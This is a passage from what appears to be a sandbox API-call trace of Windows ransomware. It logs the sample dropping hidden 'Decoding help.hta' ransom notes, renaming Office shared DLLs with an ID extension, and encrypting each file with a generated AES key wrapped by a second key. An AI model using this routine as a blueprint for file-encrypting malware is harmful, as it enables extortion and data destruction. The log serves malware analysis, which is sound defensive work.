Shared\\MSInfo\\*.*" [0047.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned 61 [0047.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\Decoding help.hta" [0047.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\decoding help.hta")) returned 0xffffffff [0047.127] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0050.368] WriteFile (in: hFile=0x604, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1445fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1445fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.668] CloseHandle (hObject=0x604) returned 1 [0052.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.714] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msinfo32.exe") returned -1 [0056.714] lstrlenW (lpString="msinfo32.exe") returned 12 [0056.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*" [0056.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\*.*") returned 61 [0056.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\", lpString2="msinfo32.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" [0056.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" [0056.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0056.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0056.719] FindNextFileW (in: hFindFile=0x5db838, lpFindFileData=0x1445fd30 | out: lpFindFileData=0x1445fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 0 [0056.720] FindClose (in: hFindFile=0x5db838 | out: hFindFile=0x5db838) returned 1 Thread: id = 290 os_tid = 0x7f4 [0042.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*", lpFindFileData=0x1459fd30 | out: lpFindFileData=0x1459fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db538 [0042.332] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.332] FindNextFileW (in: hFindFile=0x5db538, lpFindFileData=0x1459fd30 | out: lpFindFileData=0x1459fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.332] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.332] FindNextFileW (in: hFindFile=0x5db538, lpFindFileData=0x1459fd30 | out: lpFindFileData=0x1459fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.332] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0042.332] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0042.332] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0042.332] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0042.332] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0042.332] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033" [0042.333] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0042.333] GlobalMemoryStatus (in: lpBuffer=0x1459fd10 | out: lpBuffer=0x1459fd10) [0042.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x108f8660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5c8 [0042.335] CloseHandle (hObject=0x5c8) returned 1 [0042.335] FindNextFileW (in: hFindFile=0x5db538, lpFindFileData=0x1459fd30 | out: lpFindFileData=0x1459fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703dbc00, ftCreationTime.dwHighDateTime=0x1cbdfc0, ftLastAccessTime.dwLowDateTime=0xd80a4ee0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x703dbc00, ftLastWriteTime.dwHighDateTime=0x1cbdfc0, nFileSizeHigh=0x0, nFileSizeLow=0x310788, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACECORE.DLL", cAlternateFileName="")) returned 1 [0042.335] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0042.335] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0042.335] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" [0042.335] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\decoding help.hta")) returned 0xffffffff [0042.336] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0042.357] WriteFile (in: hFile=0x5d8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1459fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1459fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.357] CloseHandle (hObject=0x5d8) returned 1 [0042.358] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.358] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACECORE.DLL") returned 1 [0042.358] lstrlenW (lpString="ACECORE.DLL") returned 11 [0042.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0042.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0042.358] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="ACECORE.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" [0042.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" [0042.358] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acecore.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0042.360] CreateFileMappingA (hFile=0x5d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x5dc [0042.360] CryptAcquireContextA (in: phProv=0x1459fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1459fcec*=0x3448500) returned 1 [0042.361] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0x1459fce8 | out: phKey=0x1459fce8*=0x5db678) returned 1 [0042.361] CryptExportKey (in: hKey=0x5db678, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1459fbe4, pdwDataLen=0x1459fce4 | out: pbData=0x1459fbe4*, pdwDataLen=0x1459fce4*=0x2c) returned 1 [0042.361] MapViewOfFile (hFileMappingObject=0x5dc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xb190000 [0042.595] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1459fbe4*, pdwDataLen=0x1459fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1459fbe4*, pdwDataLen=0x1459fcf8*=0x100) returned 1 [0042.595] CryptEncrypt (in: hKey=0x5db678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb190000, pdwDataLen=0x1459fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xb190000*, pdwDataLen=0x1459fce4*=0x100000) returned 1 [0045.735] UnmapViewOfFile (lpBaseAddress=0xb190000) returned 1 [0045.932] CloseHandle (hObject=0x5dc) returned 1 [0045.932] CryptDestroyKey (hKey=0x5db678) returned 1 [0045.932] CryptReleaseContext (hProv=0x3448500, dwFlags=0x0) returned 1 [0045.932] SetFilePointerEx (in: hFile=0x5d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.932] WriteFile (in: hFile=0x5d8, lpBuffer=0x1459fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1459fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1459fbe4*, lpNumberOfBytesWritten=0x1459fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.001] WriteFile (in: hFile=0x5d8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1459fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1459fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.001] CloseHandle (hObject=0x5d8) returned 1 [0048.104] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACECORE.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.374] FindNextFileW (in: hFindFile=0x5db538, lpFindFileData=0x1459fd30 | out: lpFindFileData=0x1459fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3706ca00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd80f11a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3706ca00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xb5db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEDAO.DLL", cAlternateFileName="")) returned 1 [0050.374] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0050.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0050.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" [0050.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\decoding help.hta")) returned 0x1 [0050.374] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACEDAO.DLL") returned 1 [0050.374] lstrlenW (lpString="ACEDAO.DLL") returned 10 [0050.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0050.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0050.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="ACEDAO.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" [0050.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" [0050.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0050.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0053.653] CreateFileMappingA (hFile=0x414, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x724 [0053.653] CryptAcquireContextA (in: phProv=0x1459fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1459fcec*=0x344a0a0) returned 1 [0055.120] CryptGenKey (in: hProv=0x344a0a0, Algid=0x6610, dwFlags=0x1, phKey=0x1459fce8 | out: phKey=0x1459fce8*=0x5db738) returned 1 [0055.120] CryptExportKey (in: hKey=0x5db738, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1459fbe4, pdwDataLen=0x1459fce4 | out: pbData=0x1459fbe4*, pdwDataLen=0x1459fce4*=0x2c) returned 1 [0055.120] MapViewOfFile (hFileMappingObject=0x724, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb5da0) returned 0xa3d0000 [0055.146] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1459fbe4*, pdwDataLen=0x1459fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1459fbe4*, pdwDataLen=0x1459fcf8*=0x100) returned 1 [0055.146] CryptEncrypt (in: hKey=0x5db738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xa3d0000, pdwDataLen=0x1459fce4*=0xb5da0, dwBufLen=0xb5da0 | out: pbData=0xa3d0000*, pdwDataLen=0x1459fce4*=0xb5da0) returned 1 [0056.652] UnmapViewOfFile (lpBaseAddress=0xa3d0000) returned 1 [0056.661] CloseHandle (hObject=0x724) returned 1 [0056.661] CryptDestroyKey (hKey=0x5db738) returned 1 [0056.661] CryptReleaseContext (hProv=0x344a0a0, dwFlags=0x0) returned 1 [0056.661] SetFilePointerEx (in: hFile=0x414, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.661] WriteFile (in: hFile=0x414, lpBuffer=0x1459fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1459fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1459fbe4*, lpNumberOfBytesWritten=0x1459fcf8*=0x100, lpOverlapped=0x0) returned 1 [0058.224] WriteFile (in: hFile=0x414, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1459fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1459fcf8*=0x500, lpOverlapped=0x0) returned 1 [0058.225] CloseHandle (hObject=0x414) returned 1 [0058.225] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.225] FindNextFileW (in: hFindFile=0x5db538, lpFindFileData=0x1459fd30 | out: lpFindFileData=0x1459fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0x51128590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0xa990, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEERR.DLL", cAlternateFileName="")) returned 1 [0058.225] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0058.225] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0058.225] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" [0058.225] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\decoding help.hta")) returned 0x1 [0058.226] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACEERR.DLL") returned 1 [0058.226] lstrlenW (lpString="ACEERR.DLL") returned 10 [0058.226] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*" [0058.226] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*.*") returned 63 [0058.226] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\", lpString2="ACEERR.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" [0058.226] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" [0058.226] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0058.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEERR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceerr.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x998 [0061.607] CreateFileMappingA (hFile=0x998, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x98c [0061.607] CryptAcquireContextA (phProv=0x1459fcec, szContainer=0x0, szProvider=0x0, 